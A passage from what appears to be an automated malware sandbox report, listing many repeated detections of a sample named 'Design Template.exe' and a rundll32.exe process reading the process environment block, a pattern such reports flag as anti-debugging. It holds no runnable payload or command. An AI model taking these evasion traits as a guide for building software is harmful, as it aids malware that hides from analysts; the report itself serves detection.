        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h]4_2_00A32581
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h]4_2_00A32581
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h]4_2_00A32581
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]4_2_00A02D8A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]4_2_00A02D8A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]4_2_00A02D8A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]4_2_00A02D8A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h]4_2_00A02D8A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3FD9B mov eax, dword ptr fs:[00000030h]4_2_00A3FD9B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3FD9B mov eax, dword ptr fs:[00000030h]4_2_00A3FD9B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]4_2_00A1D5E0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]4_2_00A1D5E0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]4_2_00ACFDE2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]4_2_00ACFDE2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]4_2_00ACFDE2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]4_2_00ACFDE2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AB8DF1 mov eax, dword ptr fs:[00000030h]4_2_00AB8DF1
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]4_2_00A86DC9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]4_2_00A86DC9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]4_2_00A86DC9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov ecx, dword ptr fs:[00000030h]4_2_00A86DC9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]4_2_00A86DC9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h]4_2_00A86DC9
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0AD30 mov eax, dword ptr fs:[00000030h]4_2_00A0AD30
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h]4_2_00A13D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACE539 mov eax, dword ptr fs:[00000030h]4_2_00ACE539
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34D3B mov eax, dword ptr fs:[00000030h]4_2_00A34D3B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34D3B mov eax, dword ptr fs:[00000030h]4_2_00A34D3B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A34D3B mov eax, dword ptr fs:[00000030h]4_2_00A34D3B
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8D34 mov eax, dword ptr fs:[00000030h]4_2_00AD8D34
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A8A537 mov eax, dword ptr fs:[00000030h]4_2_00A8A537
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2C577 mov eax, dword ptr fs:[00000030h]4_2_00A2C577
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2C577 mov eax, dword ptr fs:[00000030h]4_2_00A2C577
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A43D43 mov eax, dword ptr fs:[00000030h]4_2_00A43D43
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A83540 mov eax, dword ptr fs:[00000030h]4_2_00A83540
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A27D50 mov eax, dword ptr fs:[00000030h]4_2_00A27D50
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]4_2_00AD0EA5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]4_2_00AD0EA5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]4_2_00AD0EA5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A846A7 mov eax, dword ptr fs:[00000030h]4_2_00A846A7
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9FE87 mov eax, dword ptr fs:[00000030h]4_2_00A9FE87
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A316E0 mov ecx, dword ptr fs:[00000030h]4_2_00A316E0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A176E2 mov eax, dword ptr fs:[00000030h]4_2_00A176E2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A48EC7 mov eax, dword ptr fs:[00000030h]4_2_00A48EC7
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABFEC0 mov eax, dword ptr fs:[00000030h]4_2_00ABFEC0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A336CC mov eax, dword ptr fs:[00000030h]4_2_00A336CC
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8ED6 mov eax, dword ptr fs:[00000030h]4_2_00AD8ED6
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0E620 mov eax, dword ptr fs:[00000030h]4_2_00A0E620
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ABFE3F mov eax, dword ptr fs:[00000030h]4_2_00ABFE3F
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0C600 mov eax, dword ptr fs:[00000030h]4_2_00A0C600
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0C600 mov eax, dword ptr fs:[00000030h]4_2_00A0C600
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0C600 mov eax, dword ptr fs:[00000030h]4_2_00A0C600
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A38E00 mov eax, dword ptr fs:[00000030h]4_2_00A38E00
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1608 mov eax, dword ptr fs:[00000030h]4_2_00AC1608
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A61C mov eax, dword ptr fs:[00000030h]4_2_00A3A61C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A61C mov eax, dword ptr fs:[00000030h]4_2_00A3A61C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1766D mov eax, dword ptr fs:[00000030h]4_2_00A1766D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]4_2_00A2AE73
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]4_2_00A2AE73
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]4_2_00A2AE73
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]4_2_00A2AE73
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h]4_2_00A2AE73
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]4_2_00A17E41
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]4_2_00A17E41
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]4_2_00A17E41
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]4_2_00A17E41
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]4_2_00A17E41
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h]4_2_00A17E41
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACAE44 mov eax, dword ptr fs:[00000030h]4_2_00ACAE44
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACAE44 mov eax, dword ptr fs:[00000030h]4_2_00ACAE44
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A18794 mov eax, dword ptr fs:[00000030h]4_2_00A18794
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87794 mov eax, dword ptr fs:[00000030h]4_2_00A87794
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87794 mov eax, dword ptr fs:[00000030h]4_2_00A87794
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A87794 mov eax, dword ptr fs:[00000030h]4_2_00A87794
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A437F5 mov eax, dword ptr fs:[00000030h]4_2_00A437F5
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A04F2E mov eax, dword ptr fs:[00000030h]4_2_00A04F2E
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A04F2E mov eax, dword ptr fs:[00000030h]4_2_00A04F2E
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3E730 mov eax, dword ptr fs:[00000030h]4_2_00A3E730
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD070D mov eax, dword ptr fs:[00000030h]4_2_00AD070D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD070D mov eax, dword ptr fs:[00000030h]4_2_00AD070D
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A70E mov eax, dword ptr fs:[00000030h]4_2_00A3A70E
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3A70E mov eax, dword ptr fs:[00000030h]4_2_00A3A70E
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A2F716 mov eax, dword ptr fs:[00000030h]4_2_00A2F716
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9FF10 mov eax, dword ptr fs:[00000030h]4_2_00A9FF10
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A9FF10 mov eax, dword ptr fs:[00000030h]4_2_00A9FF10
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1FF60 mov eax, dword ptr fs:[00000030h]4_2_00A1FF60
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD8F6A mov eax, dword ptr fs:[00000030h]4_2_00AD8F6A
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1EF40 mov eax, dword ptr fs:[00000030h]4_2_00A1EF40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA44B mov eax, dword ptr fs:[00000030h]14_2_044BA44B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451C450 mov eax, dword ptr fs:[00000030h]14_2_0451C450
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451C450 mov eax, dword ptr fs:[00000030h]14_2_0451C450
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A746D mov eax, dword ptr fs:[00000030h]14_2_044A746D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h]14_2_04541C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455740D mov eax, dword ptr fs:[00000030h]14_2_0455740D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455740D mov eax, dword ptr fs:[00000030h]14_2_0455740D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455740D mov eax, dword ptr fs:[00000030h]14_2_0455740D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h]14_2_04506C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h]14_2_04506C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h]14_2_04506C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h]14_2_04506C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BBC2C mov eax, dword ptr fs:[00000030h]14_2_044BBC2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558CD6 mov eax, dword ptr fs:[00000030h]14_2_04558CD6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h]14_2_04506CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h]14_2_04506CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h]14_2_04506CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045414FB mov eax, dword ptr fs:[00000030h]14_2_045414FB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449849B mov eax, dword ptr fs:[00000030h]14_2_0449849B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C3D43 mov eax, dword ptr fs:[00000030h]14_2_044C3D43
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04503540 mov eax, dword ptr fs:[00000030h]14_2_04503540
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A7D50 mov eax, dword ptr fs:[00000030h]14_2_044A7D50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AC577 mov eax, dword ptr fs:[00000030h]14_2_044AC577
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AC577 mov eax, dword ptr fs:[00000030h]14_2_044AC577
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558D34 mov eax, dword ptr fs:[00000030h]14_2_04558D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0450A537 mov eax, dword ptr fs:[00000030h]14_2_0450A537
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454E539 mov eax, dword ptr fs:[00000030h]14_2_0454E539
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h]14_2_044B4D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h]14_2_044B4D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h]14_2_044B4D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448AD30 mov eax, dword ptr fs:[00000030h]14_2_0448AD30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h]14_2_04493D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]14_2_04506DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]14_2_04506DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]14_2_04506DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov ecx, dword ptr fs:[00000030h]14_2_04506DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]14_2_04506DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h]14_2_04506DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04538DF1 mov eax, dword ptr fs:[00000030h]14_2_04538DF1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449D5E0 mov eax, dword ptr fs:[00000030h]14_2_0449D5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449D5E0 mov eax, dword ptr fs:[00000030h]14_2_0449D5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h]14_2_0454FDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h]14_2_0454FDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h]14_2_0454FDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h]14_2_0454FDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]14_2_04482D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]14_2_04482D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]14_2_04482D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]14_2_04482D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h]14_2_04482D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h]14_2_044B2581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h]14_2_044B2581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h]14_2_044B2581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h]14_2_044B2581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BFD9B mov eax, dword ptr fs:[00000030h]14_2_044BFD9B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BFD9B mov eax, dword ptr fs:[00000030h]14_2_044BFD9B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B35A1 mov eax, dword ptr fs:[00000030h]14_2_044B35A1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045505AC mov eax, dword ptr fs:[00000030h]14_2_045505AC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045505AC mov eax, dword ptr fs:[00000030h]14_2_045505AC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h]14_2_044B1DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h]14_2_044B1DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h]14_2_044B1DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]14_2_04497E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]14_2_04497E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]14_2_04497E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]14_2_04497E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]14_2_04497E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h]14_2_04497E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454AE44 mov eax, dword ptr fs:[00000030h]14_2_0454AE44
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454AE44 mov eax, dword ptr fs:[00000030h]14_2_0454AE44
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449766D mov eax, dword ptr fs:[00000030h]14_2_0449766D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]14_2_044AAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]14_2_044AAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]14_2_044AAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]14_2_044AAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h]14_2_044AAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h]14_2_0448C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h]14_2_0448C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h]14_2_0448C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B8E00 mov eax, dword ptr fs:[00000030h]14_2_044B8E00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA61C mov eax, dword ptr fs:[00000030h]14_2_044BA61C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA61C mov eax, dword ptr fs:[00000030h]14_2_044BA61C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541608 mov eax, dword ptr fs:[00000030h]14_2_04541608
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448E620 mov eax, dword ptr fs:[00000030h]14_2_0448E620
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0453FE3F mov eax, dword ptr fs:[00000030h]14_2_0453FE3F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558ED6 mov eax, dword ptr fs:[00000030h]14_2_04558ED6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B36CC mov eax, dword ptr fs:[00000030h]14_2_044B36CC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C8EC7 mov eax, dword ptr fs:[00000030h]14_2_044C8EC7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0453FEC0 mov eax, dword ptr fs:[00000030h]14_2_0453FEC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B16E0 mov ecx, dword ptr fs:[00000030h]14_2_044B16E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044976E2 mov eax, dword ptr fs:[00000030h]14_2_044976E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451FE87 mov eax, dword ptr fs:[00000030h]14_2_0451FE87
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h]14_2_04550EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h]14_2_04550EA5
